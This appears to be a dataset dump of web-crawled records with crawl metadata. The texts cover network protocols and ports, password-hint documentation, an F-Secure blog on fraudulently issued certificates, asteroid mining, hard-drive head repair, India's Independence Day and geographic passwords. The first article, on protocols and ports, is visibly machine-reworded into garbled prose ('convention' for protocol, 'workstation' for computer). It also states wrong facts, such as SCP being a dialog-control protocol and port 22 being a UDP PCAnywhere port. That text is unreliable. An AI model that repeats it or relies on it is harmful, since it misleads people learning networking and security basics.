text
stringlengths
234
589k
id
stringlengths
47
47
dump
stringclasses
62 values
url
stringlengths
16
734
date
stringlengths
20
20
file_path
stringlengths
109
155
language
stringclasses
1 value
language_score
float64
0.65
1
token_count
int64
57
124k
score
float64
2.52
4.91
int_score
int64
3
5
Implementing common network security protocols, Network ports and services Here are the lists of the protocols which are available to one; IPsec: It is a convention suite for securing Internet Protocol (IP) correspondences by validating and scrambling every IP bundle of a correspondence session. Ipsec incorporates conventions for making common verification between executors at the start of the session and arrangement of cryptographic keys to be utilized amid the session. Ipsec could be utilized as a part of ensuring information streams between a couple of hosts (host-to-have), between a couple of security entryways (system to-system), or between a security entryway and a host (system to-host).internet Protocol security (Ipsec) utilizes cryptographic security administrations to ensure correspondences over Internet Protocol (IP) systems. Ipsec backings system level associate validation, information starting point verification, information respectability, information (encryption) and replay security. Ipsec is an end-to-end security plan working in the Internet Layer of the Internet Protocol Suite, while some other Internet security frameworks in boundless use, for example, Transport Layer Security (TLS) and Secure Shell (SSH), work in the upper layers at Application layer. Henceforth, just Ipsec ensures any application traffics over an IP system. Applications might be naturally secured by its Ipsec at the IP layer. Without Ipsec, the conventions of TLS/SSL must be embedded under each of uses for security. SNMP: It (SNMP) is a mainstream convention for system administration. It is utilized for gathering data from, and designing, system gadgets, for example, servers, printers, centers, switches, and switches on an Internet Protocol (IP) system. SSH: It (SSH) is a cryptographic system convention for secure information correspondence, remote charge line login, remote summon execution, and other secure system benefits between two arranged workstations. DNS: It is (DNS) is one of the business standard suites of conventions that embody TCP/IP. Microsoft Windows Server 2003 DNS is executed utilizing two product segments: the DNS server and the DNS customer (or resolver). TLS: TLS is a successor to Secure Sockets Layer convention, or SSL. TLS gives secure interchanges on the Internet for such things as email, Internet faxing, and other information exchanges. There are slight contrasts between SSL 3.0 and TLS 1.0, yet the convention remains considerably the same. SSL: is the standard security engineering for building an encoded connection between a web server and a program. This connection guarantees that all information passed between the web server and programs stay private and basic. TCP/IP: In software engineering and in Information and correspondences innovation, the Internet convention suite is the machine systems administration model and interchanges conventions utilized by the Internet and comparative workstation systems. FTPS: FTPS is an expansion to the regularly utilized File Transfer Protocol that includes help for the Transport Layer Security and the Secure Sockets Layer cryptographic conventions HTTPS: It's the dialect that is utilized to convey data over the web, and it's the first component one see in any URL. Most web programs (counting Internet Explorer) utilize a scrambled convention called Secure Sockets Layer (SSL) to get to secure website pages. SCP: SCP is a straightforward convention which lets a server and customer has different discussions over a solitary TCP association. The convention is intended to be easy to actualize, and is designed according to TCP. SCP's primary administration is dialog control. ICMP: It is one of the primary conventions of the Internet Protocol Suite. It is utilized by system gadgets, in the same way as switches, to send failure messages showing, for instance, that an asked for administration is not accessible or that a host or switch couldn't be arrived at. IPv4: It is the fourth form in the advancement of the Internet Protocol (IP) Internet, and courses most activity on the Internet. Nonetheless, a successor convention, Ipv6, has been characterized and is in different phases of generation organization IPv6: It is the most recent adaptation of the Internet Protocol (IP), the correspondences convention that gives a distinguishing proof and area framework for machines on systems and courses movement over the Internet. ISCSI: It is a method for associating stockpiling gadgets over a system utilizing TCP/IP. It could be utilized over a neighborhood (LAN), a wide region system (WAN), or the Internet. Iscsi gadgets are plates, tapes, CDs, and other stockpiling gadgets on an alternate organized workstation that one can associate with. Fiber Channel: FC, is a rapid system engineering (normally running at 2-, 4-, 8- and 16-gigabit for every second rates) essential used to unite machine information stockpiling. FCoE: It is a machine system engineering that typifies Fiber Channel outlines over Ethernet systems. This permits Fiber Channel to utilize 10 Gigabit Ethernet systems (or higher velocities) while safeguarding the Fiber Channel convention. FTP: It is a standard system convention used to exchange workstation documents starting with one host then onto the next host over a TCP-based system, for example, the Internet. FTP is based on a customer server structural engineering and utilization separate control and information associations between the customer and the server. SFTP: It is a different convention bundled with SSH that works in a comparative manner over a safe association. TFTP: It is a record exchange convention striking for its effortlessness. It is by and large utilized for mechanized exchange of design or boot documents between machines in a nature's domain. TELNET: It is a system convention utilized on the Internet or neighborhood to give a bidirectional intuitive content situated correspondence office utilizing a virtual terminal association. Client information is scattered in-band with Telnet control data in an 8-bit byte arranged information association over the Transmission Control Protocol (TCP). HTTP: It is an application convention for dispersed, communitarian, hypermedia data frameworks. HTTP is the establishment of information correspondence for the World Wide Web. NetBIOS: It gives administrations identified with the session layer of the OSI model permitting applications on independent workstations to impart over a neighborhood. As strictly an API, NetBIOS is not a systems administration convention. Here are the ports which are used by one; 21: This port is used for FTP. To secure a FTP session, customers launch an association with a FTP server that listens on TCP port 21 naturally. FTP servers react with messages that incite the customer for FTP login accreditations (username and secret key). FTP servers don't, on the other hand, send documents from port number 21. Rather, the FTP convention considers a second association with be built for information exchange after the control association is made. Note that just FTP servers use port 21, not FTP customers. 22: Port 22 (UDP) is the default port for some PCAnywhere administrations. Note that there is not association with PCAnywhere. SSH-SSH runs on TCP port 22 of course. Customers use irregular ports to unite with port 22 on the framework they are attempting to log onto. 25: Port 25 is the committed Internet port utilized for sending email. It is likewise utilized by spammers to send undesirable email, new infections and worms will regularly spread over the Internet utilizing this port. That is the reason we channel it. 53: This port related to the DNS. The Domain Name System (DNS) is a progressive disseminated naming framework for workstations, administrations, or any asset associated with the Internet or a private system. It partners different data with area names appointed to each of the taking an interest substances. Most conspicuously, it interprets effortlessly remembered space names to the numerical IP locations required with the end goal of spotting workstation administrations and gadgets around the world. The Domain Name System is a fundamental part of the usefulness of the Internet. 80: Port 80 is a well-known port, which implies it is well-known as the area one'll regularly find HTTP servers. 110: This one is used for post office protocol. In registering, the Post Office Protocol is an application-layer Internet standard convention utilized by nearby email customers to recover email from a remote server over a TCP/IP association. POP and IMAP are the two most predominant Internet standard conventions for email recovery. 139: In NBT, the session administration runs on TCP port 139. The session administration primitives offered by NetBIOS are: Call - opens a session to a remote NetBIOS name. Listen - listen for endeavors to open a session to a NetBIOS name. 143: With this port, Web message access convention is a convention for email recovery. 443: On account of https, inasmuch as the default port utilized for standard non-secured "http" is port 80, Netscape picked 443 to be the default port utilized by secure http. 3389: Naturally, the server listens on TCP port 3389 and UDP port 3389. Microsoft at present alludes to their authority RDP server programming as Remote Desktop Connection As techs we utilize the OSI demonstrate all the time as a system tech when inconvenience shooting a system association. Since our systems where expand on this model we utilize it regardless of the fact that we aren't generally mindful of it. Being mindful of it may help one correspond better with individuals/merchants about system circumstances. Numerous organizations require broad OSI information for a systems administration certificate both are models used to clarify how systems administration can work. Both hold a set of layers where each one speak with the layer quickly above and underneath itself, guaranteeing that information might be exchanged starting from the user, to a level where it could be physically transmitted. The profit to this technique is that whatever programming lives/works on a specific layer, just needs to convey information up or down "one stage" (one layer). Once the information is sent starting with one layer then onto the next, it is no more a sympathy toward the layer that sent it. Upper layers are legitimately closer to the client. TCP/IP is likewise alluded to as "the TCP/IP Suite" or essentially "Web Protocol Suite". Contrasts: SI is a hypothetical reference model where TCP/IP is a suite of particular system conventions. As it were, TCP/IP is less hypothetical, but rather more it is a depiction of eagerly utilized conventions within a system. OSI is a bland, convention autonomous standard. Consider it rules to how a system might be manufactured. The Internet as we know today is focused around TCP/IP, which is the main motivation TCP/IP selection is so enormous. OSI has 7 layers and TCP/IP has 4. He OSI model isn't generally relevant, and doesn't generally fit with what none're doing. In this manner it's paramount not to attempt to "make it fit", when it doesn't bode well. Just utilize the OSI model in the event that it makes one life less demanding, overall, screw it asking at what layer a specific gadget dwell does, can now and then prompt inconvenience. As an illustration, endeavor switches (that just do steering) fit on OSI layer 3. Be that as it may a SOHO switch (which one likely have at home) - where the switch has an implicit switch and numerous different administrations - works on various layers. Switches for instance, fit in with OSI layer 2. How the money adds up is that OSI is a device which when utilized the right way, could be exceptionally useful. OSI can make it simpler for both arranging, setups and troubleshooting issues. At the point when for instance one stroll into an obscure circumstance to figure out why individuals aren't getting on the Internet, one can efficiently take a gander at the layers and prohibit where the issue isn't, consequently narrowing it down. Sometimes one'll perceive immediately that this is a "level 6 issues" or a "level 2 issues" and one act like So, one should know that there are many of the ports which are available. One should have knowledge about them all so that he can utilize them in better way. Also, knowing about them would ensure that one knows how to make them secure. There are many protocols and each one has some separated port with which they work. So it must be of interest to someone knowing that which port is done with which protocol and hence he can get some good understandings of the thing that how systems work together.
<urn:uuid:e368b8bf-115b-4866-89fb-ce7dff7a9359>
CC-MAIN-2017-04
https://www.examcollection.com/certification-training/security-plus-implementing-common-network-security-protocols.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281151.11/warc/CC-MAIN-20170116095121-00564-ip-10-171-10-70.ec2.internal.warc.gz
en
0.910218
2,581
3.09375
3
When you choose to exchange information between connected systems, you should take precautions to make sure that the exchange is secure. This is especially true for passwords. The Password Hint attribute (nsimHint) is publicly readable, to allow unauthenticated users who have forgotten a password to access their own hints. Password Hints can help reduce help desk calls. For security, Password Hints are checked to make sure that they do not contain the user's actual password. However, a user could still create a Password Hint that gives too much information about the password. To increase security when using Password Hints: Allow access to the nsimHint attribute only on the LDAP server used for Password Self-Service. Require that users answer Challenge Questions before receiving the Password Hint. Remind users to create Password Hints that only they would understand. The Password Change Message in the password policy is one way to do this. See “Adding a Password Change Message” in the Password Management 3.3 Administration Guide. If you choose not to use Password Hint at all, make sure you don't use it in any of the password policies. To prevent Password Hints from being set, you can go a step further and remove the Hint Setup gadget completely, as described in “Disabling Password Hint by Removing the Hint Gadget” in the Password Management 3.3 Administration Guide. Challenge Questions are publicly readable, to allow unauthenticated users who have forgotten a password to authenticate another way. Requiring Challenge Questions increases the security of Forgotten Password Self-Service, because a user must prove his or her identity by giving the correct responses before receiving a forgotten password or a Password Hint, or resetting a password. The intruder lockout setting is enforced for Challenge Questions, so the number of incorrect attempts an intruder could make is limited. However, a user could create Challenge Questions that hold clues to the password. Remind users to create Challenge Questions and Responses that only they would understand. The Password Change Message in the password policy is one way to do this. See “Adding a Password Change Message” in the Password Management 3.3 Administration Guide. For security, the Forgotten Password actions ofand are available only if you require the user to answer Challenge Questions. A security enhancement was added to NMAS 2.3.4 regarding Universal Passwords changed by an administrator. It works basically the same way as the feature previously provided for NDS Password. If an administrator changes a user's password, such as when creating a new user or in response to a help desk call, the password is automatically expired if you have enabled the setting to expire passwords in the password policy. The setting in the password policy is in Advanced Password Rules, named. For this particular feature, the number of days is not important, but the setting must be enabled.
<urn:uuid:4da47cc1-8fba-46e0-a513-c5731d4700a4>
CC-MAIN-2017-04
https://www.netiq.com/documentation/idm402/idm_security/data/brjaxy4.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281151.11/warc/CC-MAIN-20170116095121-00564-ip-10-171-10-70.ec2.internal.warc.gz
en
0.909354
596
2.671875
3
Recent events have highlighted that certification — and the lack of accountability in code signing and SSL certificates — have become a major issue. Having an SSL certificate is a way for website owners to prove to their sites' visitors that they really are the genuine owners. Most Internet users and even major Internet companies implicitly trust the Certification Authorities (CAs). CAs sell SSL certificates for the encryption of web traffic, which enables secure transactions such as online banking and shopping across https connections. However, the current certification system dates from the 1990s and has not scaled well to the sheer size and complexity of the Internet today. In addition to the major certification companies such as Verisign, GoDaddy and Comodo, there are hundreds or even thousands of regional CAs that are basically resellers for the larger companies. Comodo recently announced that a hacker had gained entry to its systems by obtaining the password and username of one of Comodo's Italian resellers. The hacker, who has since publicly claimed that he is from Iran, issued nine rogue certificates through the company. The certificates were issued for popular domains like google.com, yahoo.com and skype.com. It just boggles the mind that a small reseller in Italy can issue a certificate for google.com in the first place. You would think that would trip some sanity check somewhere. It didn't. What can you do with such a certificate? If you are a government and able to control Internet routing within your country, you can reroute all, say, Skype users to a fake https://login.skype.com address and collect their usernames and passwords, regardless of the SSL encryption seemingly in place. Or you can read their e-mail when they go to Yahoo, Gmail or Hotmail. Even most geeks wouldn't notice this was going on. In August 2010 Jarno Niemelš, Senior Researcher at F-Secure, started investigating a case of identity theft also involving Comodo, after discovering a malware sample that was signed by a code signing certificate. He tracked down the company mentioned in the certificate, and found a small consulting firm. Niemelš contacted the company and asked whether they were aware that their code signing certificate had been stolen. Their response was that *they did not have any code signing certificates*. In fact, they didn't even produce software and therefore had nothing to sign. Clearly someone else had obtained the certificate in their name; they had been a victim of corporate identity theft. With the help of the victim and Comodo, Niemelš discovered that the certificate had been requested in the name of an actual employee and that Comodo had used both e-mail and phone call verification to check the identity of the applicant. Unfortunately, the fraudster had access to the employee's e-mail and Comodo's phone call verification had either ended up with the wrong person or had failed due to a misunderstanding. In fact, the compromised employee had also received a phone call from Thawte, another CA company. When Thawte asked if she had requested a code signing certificate in the company's name, she answered "No". Thawte then aborted the certification process. This case shows that the malware authors will try multiple CAs until they find a way in. When scammers have access to a company's e-mail, it is very difficult for a CA to verify whether the request coming from the company is genuine. It is likely that we will see more cases where an innocent company with a good reputation is used as a proxy for malware authors to get their hands on valid certificates. Certification Authorities already have measures to pass information about suspicious certification attempts, and other kinds of system abuse. However, these systems are maintained by humans and are thus fallible. We have to accept the fact that with the current systems, certificates are not fool proof.
<urn:uuid:017da967-e7f1-4be8-9fac-9df83b22e46b>
CC-MAIN-2017-04
https://www.f-secure.com/weblog/archives/00002155.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281574.78/warc/CC-MAIN-20170116095121-00472-ip-10-171-10-70.ec2.internal.warc.gz
en
0.977091
793
2.65625
3
A new company intends by 2015 to send a fleet of tiny satellites, known as cubesats into near-Earth space to mine passing asteroids for high-value metals. Deep Space Industries asteroid mining proposal begins in 2015 when the company plans to send out a squadron of 55lb cubesats called Fireflies that will explore near-Earth space for two to six months looking for target asteroids Then in 2016, Deep Space said it will begin launching 70-lb DragonFlies for round-trip visits that bring back samples. The DragonFly expeditions will take two to four years, depending on the target, and will return 60 to 150 lbs of asteroid materiel. Collecting asteroid metals is only part of the company's plans however. DSI said it has a has a patent-pending technology called the MicroGravity Foundry that can transform raw asteroid material into complex metal parts. The MicroGravity Foundry is a 3D printer that uses lasers to draw patterns in a nickel-charged gas medium, causing the nickel to be deposited in precise patterns. A much larger spacecraft known as a Harvestor-class machine could "return thousands of tons per year, producing water, propellant, metals, building materials and shielding for everything we do in space in decades to come. Initial markets will be customers in space, where any substance is very expensive due to the cost of launching from Earth, over time, as costs drop and technologies improve we can then begin "exporting" back to Earth," the company stated. The company envisions creating outposts that could offer satellite or spacecraft refueling for example. Bringing back asteroid materials is only one part of the company's plans though. DSI said it has a patent-pending technology called the MicroGravity Foundry to transform raw asteroid material into complex metal parts in space. The MicroGravity Foundry is a 3D printer that uses lasers to draw patterns in a nickel-charged gas medium, causing the nickel to be deposited in precise patterns, the company stated. "Mining asteroids for rare metals alone isn't economical, but makes senses if you already are processing them for volatiles and bulk metals for in-space uses," said Mark Sonter, a member of the DSI Board of Directors. "Turning asteroids into propellant and building materials damages no ecospheres since they are lifeless rocks left over from the formation of the solar system. Several hundred thousand that cross near Earth are available." The MicroGravity Foundry will enable early utilization of asteroid material to produce structural parts, fasteners, gears, and other components to repair in-space machinery and to create new space infrastructure, such as solar power satellites. A version of the MGF process will be licensed to terrestrial users; the underlying process is more straightforward than those now employed to digitally print metal components, DSI stated. "Using resources harvested in space is the only way to afford permanent space development," said DSI CEO David Gump. "More than 900 new asteroids that pass near Earth are discovered every year. They can be like the Iron Range of Minnesota was for the Detroit car industry last century - a key resource located near where it was needed. In this case, metals and fuel from asteroids can expand the in-space industries of this century. That is our strategy." If that strategy sound familiar it should. Last year Google executives Larry Page and Eric Schmidt and filmmaker James Cameron said they would bankroll a venture to survey and eventually extract precious metals and rare minerals from asteroids that orbit near Earth. Planetary Resources, based in Bellevue, Wash., initially will focus on developing and selling extremely low-cost robotic spacecraft for surveying missions. Planetary says asteroid resources have some unique characteristics that make them especially attractive. Unlike Earth, where heavier metals are close to the core, metals in asteroids are distributed throughout their body, making them easier to extract. Asteroids contain valuable and useful materials like iron, nickel, water and rare platinum group metals, often in significantly higher concentration than found in mines on Earth. Check out these other hot stories:
<urn:uuid:3be5b246-49e3-4d8e-87df-300ee6a51bd2>
CC-MAIN-2017-04
http://www.networkworld.com/article/2223889/data-center/company-set-to-blast-squadron-of-tiny-satellites-into-space-to-mine-asteroids.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281659.81/warc/CC-MAIN-20170116095121-00316-ip-10-171-10-70.ec2.internal.warc.gz
en
0.94247
831
2.984375
3
A read/write head is the business end of a hard drive. It’s the hitch of a trailer, the edge of a knife, the nib of a pen, the glove of an outfielder. It’s the interface of separate parts. It’s where the action happens. When it reads data, it floats within a few nanometers of a spinning platter. Tiny magnetic differences on the surface of the platter — basically on or off signals — induce electrical pulses in the head, which become the stream of 1s and 0s that the right software will turn into the movie “Zoolander,” or whatever you happen to have on your hard drive. When it writes data, electric signals flow through the head and magnetize a series of points on the platter. We sometimes compare the read/write heads to needles on record players, but a needle — or stylus — is only a one-way translator. A needle sits in a groove and vibrates in response to the wave-like shapes that were cut into the groove. It doesn’t write anything onto a record, and the action is mechanical, rather than electrical. In terms of what’s going on inside, the hard drive’s read/write head is actually closer to what was found in cassette players. A chief difference is scale. Hard drives now have read/write heads that need magnification to see. They float on winglike arms that carry the heads on a cushion of air so thin that you can measure it by the number of oxygen or nitrogen molecules between the head and the platter. As you might guess, these read/write heads are highly specialized, and each drive typically has several of them — usually one per platter surface, top and bottom, if storage space is to be maximized. When a read/write head fails, it’s big trouble. All of a sudden, the data on your hard drive is inaccessible. And worse, there’s a risk that a failed head could make contact with the platter. This is bad because any collision with the platter will likely scrape off the magnetized material that holds all those magnetic sign. These scratches — called rotational scoring — usually rule out successful data recovery because they have turned what was once data on a platter into dust. We routinely replace damaged read/write heads as part of our cleanroom data recoveries, and it’s a delicate operation. To perform it properly, we’ve developed proprietary data recovery tools and a vast library of compatible hard drive parts. The recovery of a failed read/write head on a Seagate Barracuda 750 GB SATA hard drive depended on a successful replacement of a head before we could recover the data. The effort was successful, and we were able to retrieve the data for Mainsail Printing & Graphics, an excellent graphic design and print shop in Savannah, Georgia. Our client there, Rob King, writes: I am a graphic designer and Gillware saved my business. I just received my hard drive from Gillware and it is flawless! 100% of my data was recovered. The price was half of what others wanted and the turnaround was faster too! My business relies on this data, so waiting a month was simply not an option. The entire process with Gillware took just over 1 business week, which includes shipping, and was very much worth the price. Thanks again, guys. You rock!
<urn:uuid:76f744f5-8ea0-4c56-a0be-e014448ad816>
CC-MAIN-2017-04
https://www.gillware.com/blog/data-recovery/anatomy-of-a-readwrite-head-failure/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280242.65/warc/CC-MAIN-20170116095120-00528-ip-10-171-10-70.ec2.internal.warc.gz
en
0.958422
714
2.875
3
Enhanced membership will give the agency a greater say in the future development of standards for interoperable geospatial information systems. The Transportation Department unveiled a Web portal for pinpointing the locations of hazardous materials around the country. THe NavTrac RTV10 device combines GPS navigation with tracking and communications tools. The nation’s crowded airspace has begun seeing the advantages of the next generation of air traffic control technology, but the implementation is only beginning, officials tell Senate panel. The geographic information systems team at NASA's Langley Research Center is using geospatial tools to find more efficient ways to allocate space at the research facility. European Space Agency's Gravity Ocean Circulation Explorer to measure Earth’s gravitational field, ocean currents. The system, named Planetary Skin, is intended to be an online, collaborative application that will make available environmental data collected from satellites and airborne, sea-based and land-based sensors. The Army Geospatial Center will support the Army Battle Command System and integrate technologies and processes to give warfighters a geospatial common operational picture. The Planetary Skin project will collect and analyze environmental data from satellite, sea-based, airborne and land-based sensors to monitor climate change. Federal and state authorities are collaborating on a project that would allow state and local caches of geospatial data to be interoperable, with the goal of creating a "Virtual USA" for emergency response. Enhancements in Geomatica 10.2 include support for Windows Vista, as well as additional satellite sensor support. Researchers are using satellite and other data to map the amount of vegetation covering the United States, which is important for assessing the effects of global warming. Terrametrix embarked on a 3,690-mile, six-city, eight-day tour to capture a 3D model of urban terrain using StreetMapper, a high-precision mapping system that employs vehicle-mounted laser scanners. New tools in Google Earth and other geospatial platforms promise to dramatically expand government’s ability to visually communicate vast amounts of data. The 406 MHz digital system provides more information than the old, analog 121.5 MHz signal and can determine location to within 5 kilometers instead of 18.
<urn:uuid:77bb8f74-81e6-4aaa-96e7-4a9d6a98d9a2>
CC-MAIN-2017-04
https://gcn.com/Articles/List/Geospatial.aspx?Page=12
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281332.92/warc/CC-MAIN-20170116095121-00096-ip-10-171-10-70.ec2.internal.warc.gz
en
0.872642
457
2.828125
3
Scientists at Arizona State University are urging managers at projects such as the Search for Extraterrestrial Intelligence (SETI) to look for evidence of alien civilizations close to home in addition to scanning cosmic radiation in hopes of finding patterns that could be alien radio signals. If there are advanced alien civilizations in the galactic neighborhood, they may well have done more than just tried so send us radio signals, according to a paper published by Paul Davies and Robert Wagner in the journal Acta Astronautica. If there are intelligent alien civilizations in our neighborhood of the galaxy, they may very well have visited Earth to observe a developing intelligence, or steal the idea for Facebook and take it back home to violate the privacy of alien species as well as domestic ones, according to the (liberally paraphrased) reasoning in the article If aliens had stopped by, they would need a base of operations, preferably one that was undetectable by human technology at the time, but offered resources such as water, gravity and, apparently, lots and lots of dust. Most science-fiction stories and alien invasion conspiracies posit a mother ship in orbit several hundred miles above the earth, rather than 238,857 miles away on the moon. Orbiting bases would allow shuttle craft to visit earth, kidnap and probe occupants, then return them to their native trailer-park habitats without having to travel the whole distance to the moon. However, even for advanced civilizations, the distance between star systems is so huge that any ship arriving here would presumably need to replenish their food, water and fuel or (if Hollywood B movies of the '50s are any indication) be desperately in need of physically incompatible women in beehive hairdos who scream a lot. Davies, by the way, is no crackpot; or at least he's not one without academic credentials. He's a theoretical physicist and cosmologist studying astrobiology – the origin and evolution of life – and founder of ASU's Beyond Center for Fundamental Concepts in Science. (He's also giving a public lecture called "Time Travel: Can it really be done" at 7 PM Jan. 31 on the ASU Tempe campus – a lecture promoted using a poster with Dr. Who's TARDIS. That indicates, if nothing else, that he knows what science topics the public wants to hear about and in what obsolete police telephone-booth form it currently understands them.) Wagner is an undergrad, but one majoring in space exploration and working as a research tech at the LRO Science Operations Center, working with the images he and Davies suggest might be a good start for a crowd-sourced search for aliens. Would aliens have landed on the moon instead of in Area 51? Except for the last, a place like the moon, where aliens could land and mine what they needed would be much better suited for a rest and replenishment stop than simply orbiting a planet from which every ounce of water, fuel or females would have to be lifted at great expense in power and fuel. Landing on the moon – whose gravitational field is one-sixth that of Earth and therefore would make takeoffs and landings far less expensive, would be much more efficient, especially for a mother ship capable of landing once, mining what it needed, and taking off again rather than making dozens of shorter trips into Earth's much deeper gravity well, the two theorize. The chance that alien explorers did come to Earth for a rest or to observe primates in their pre-space-flight developmental stages is small, Davies and Wagner admit. At least, the chance that they left definitive evidence of their presence on the moon is small. That chance is at least as good – and much less expensive and time-consuming to investigate, however – than the chance aliens not only broadcast radio signals our way and that we could recognize and interpret those signals using existing radio telescopes and community-science projects such as SETI@home (which distributes bits of data to be analyzed to screen savers installed on hundreds of thousands of volunteered PCs) or the Galaxy Zoo (which sends pictures of individual galaxies to more than 150,000 volunteers and asks a series of questions that allow them to classify each according to shape, size, configuration and other standardized descriptions). Davies and Wagner's assumption that it would be possible and cheap to find alien artifacts on the moon is based on the 192TB of data gathered so far by the Lunar Reconnaisance Orbiter, an observation satellite that orbits the moon every two hours, photographing its surface with a range of sophisticated sensors and broadcasting the result back to Earth. "Existing searchable databases from astronomy, biology, earth and planetary sciences all offer low-cost opportunities to seek a footprint of extraterrestrial technology," Davies and Wagner wrote in Searching for Alien Artifacts on the Moon. "Although there is only a tiny probability that alien technology would have left traces on the moon in the form of an artifact or surface modification of lunar features, this location has the virtue of being close, and of preserving traces for an immense duration. Systematic scrutiny of the LRO photographic images is being routinely conducted anyway for planetary science purposes, and this program could readily be expanded and outsourced at little extra cost to accommodate SETI goals, after the fashion of the SETI@home and Galaxy Zoo projects." – P.C.W. Davies, R.V. Wagner, Acta Astronautica. Searching the moon rather than other planetary bodies does is a little random, the two scientists admit. The Search for Extraterrestrial Intelligences hiding in our photo album A lot of the reason behind the suggestion aliens might have landed on our moon has more to do with the number of good photos we have of the moon, rather than the greater likelihood that aliens would have landed there rather than elsewhere. Davies and Wagner don't say the idea of searching existing photos of the moon for aliens is a lot like the guy whose wife found him crawling around the hall and asked him what he was doing. "I lost a cufflink and I'm looking for it," he told her. "Where did you lose it?" "In the living room." "Why are you looking for it in the hall?" "Because the light is better out here." The light, or at least the photos, of the moon are unquestionably better than those of anywhere else in the Solar System. The moon is also close enough that even amateur astronomers would have a chance to spot alien artifacts with home telescopes as well as LRO photos. Crowd-sourcing the search would also give professional astronomers time to focus on more important things – like mapping the course of meteors that could strike the Earth and destroy civilization – or trivial things like figuring out their belief that 95 percent of the mass of the universe is invisible to humans isn't insane or a gross miscalculation. Forget SETI@Home, sign up for Aliens On Moon Good old volunteer investigators, on the other hand, could find harder evidence of alien landings than crop circles, or even settle the other paranoid fantasy about the moon: That the whole "moon landing" thing was staged by Hollywood at the behest of The Government to trick the Russians, or sell more Wheaties or Tang or something. (Men in Black III is coming out May 25, 2012, by the way; here's the trailer.) So if you have time and interest to pore over hundreds of high-resolution photos of gray meteor dust piled on airless rock, or have a telescope you use to watch things more celestial than your surprisingly limber neighbors, check seti.org once in a while, or NASA's Lunar Reconnaissance Orbiter Twitter feed. No one has agreed to sponsor or participate in a crowd-sourced search for aliens on the moon, but you never know. NASA has lots of astronomers, most of whom are sure to know the Mayan calendar runs out in 2012, which might give NASA decision-makers some sense of urgency about finding aliens before the End of Time. (Though both the NASAi with knowledge and those who make decisions are also pretty sure to know that just means we're missing the last stone tablet carved with the Mayan equivalent of 'Please order calendar refills, or upgrade to Mayan Calendar 2: Papyrus.') And who knows, with enough pictures, examined by enough people, maybe people will begin to understand the distance, physics and importance of the universe outside our atmosphere well enough that they might be willing to actually pay to explore it. Or, at the very least, with enough eyes on Neal Armstrong's footprints and the big piles of junk humans left on the moon, maybe they'll begin to believe that even humans might be capable of travelling through space as far as the moon, even if they don't come back to kidnap and probe people from trailer parks as proof they'd been there. Read more of Kevin Fogarty's CoreIT blog and follow the latest IT news at ITworld. Follow Kevin on Twitter at @KevinFogarty. For the latest IT news, analysis and how-tos, follow ITworld on Twitter and Facebook.
<urn:uuid:02d83c16-ec15-4f20-ac44-1e2d3597579f>
CC-MAIN-2017-04
http://www.itworld.com/article/2733545/it-management/scientists-actually-have-decent-reason-to-suggest-searching-photos-moon-for-alien-artifacts.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284405.58/warc/CC-MAIN-20170116095124-00490-ip-10-171-10-70.ec2.internal.warc.gz
en
0.952519
1,886
2.65625
3
India's Independence Day - 15 August 1947 15th August, the red-letter day in the Indian calendar is celebrated as the Independence Day of India. The date commemorates the day when India achieved freedom from the British rule in the year 1947. It has been a long journey for India 1947. After more than two hundred years of British rule, India finally won backs its freedom on 15th August 1947. In history this date has a special significance as it gave birth to a new nation and a new era. Independence Day was also the end of nearly a century of struggle for freedom, battles, betrayals and sacrifices. It gave us the freedom to choose between right and wrong also created a situation where we were responsible for ourselves. Independence Day is an occasion to rejoice in our freedom and to pay collective homage to all those people who sacrificed their lives to the cause. The day is marked with flag hosting and cultural programs in the state capital and the Prime Minister's speech at the Red Fort in Delhi is the major attraction of the day's celebration. The day is celebrated as a national holiday. Schools and people hoist the national flag through out the country and put them up on the rooftops and the buildings. It is a day of celebration across India and people of all age are in a holiday mood. All the government offices are closed on this day but they are lit up with tri color lights and flag hoisting ceremonies are performed in almost all the schools and colleges to mark the occasion. Roads are decorated with tricolor flags and lights to give a patriotic feel. This list is based on the content of the title and/or content of the article displayed above which makes them more relevant and more likely to be of interest to you. We're glad you have chosen to leave a comment. Please keep in mind that all comments are moderated according to our comment policy, and all links are nofollow. Do not use keywords in the name field. Let's have a personal and meaningful conversation.comments powered by Disqus
<urn:uuid:f40d1041-7f08-4c6e-84ed-d48ff1fb0da9>
CC-MAIN-2017-04
http://www.knowledgepublisher.com/article-633.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280899.42/warc/CC-MAIN-20170116095120-00032-ip-10-171-10-70.ec2.internal.warc.gz
en
0.966116
409
3.328125
3
The massive data breaches that happened in the last few years have proven beyond doubt that the text password authentication method has many flaws. Security researchers and companies that are working on alternatives to this flawed system have though of many different schemes: picture and graphics-based passwords, inkblot-based passwords, pass-thoughts, and so on. All these approaches are looking for a method for users to created passwords that will be unique and easy to remember for the user, but difficult to guess and/or break for attackers. The latest of these attempts has been described by computer scientist Ziyad Al-Salloum of ZSS-Research in Ras Al Khaimah, UAE. He believes that “geographic” passwords are the solution to the problem (click on the screenshot to enlarge it): This approach counts on the fact that users can more easily remember a favorite place that a complex password they chose themselves. With this system, the user would choose a place on the map – the position of a tree he likes to rest under, a monument he likes to visit, a place where he experienced his first kiss, and so on – and draw a boundary around it. “Selecting a geographical area can be done using different ways and shapes, a user – for example – can place a circle around his favorite mountain, or a polygon around his favorite set of trees, for an example,” explains Al-Salloum. “No matter how geographical areas are selected, the geographical information that can be driven from these areas (such as longitude, latitude, altitude, areas, perimeters, sides, angels, radius, or others) form the geographical password.” All this information is used to “calculate” the password, which then gets “salted” with a user-specific random string of characters, and all this together gets “hashed” in the end. In this way, different users will effectively never have the same password. This type of password has many advantages: they are easy to remember and hard to forget, diverse, and hard to predict. And, according to Al-Salloum, “proposing an effective replacement of conventional passwords could reduce 76% of data breaches, based on an analysis of more than 47000 reported security incidents.”
<urn:uuid:09ecd75c-f04e-45eb-92b9-9cd61a60d0bd>
CC-MAIN-2017-04
https://www.helpnetsecurity.com/2014/02/17/geographical-passwords-as-a-solution-to-the-password-problem/
null
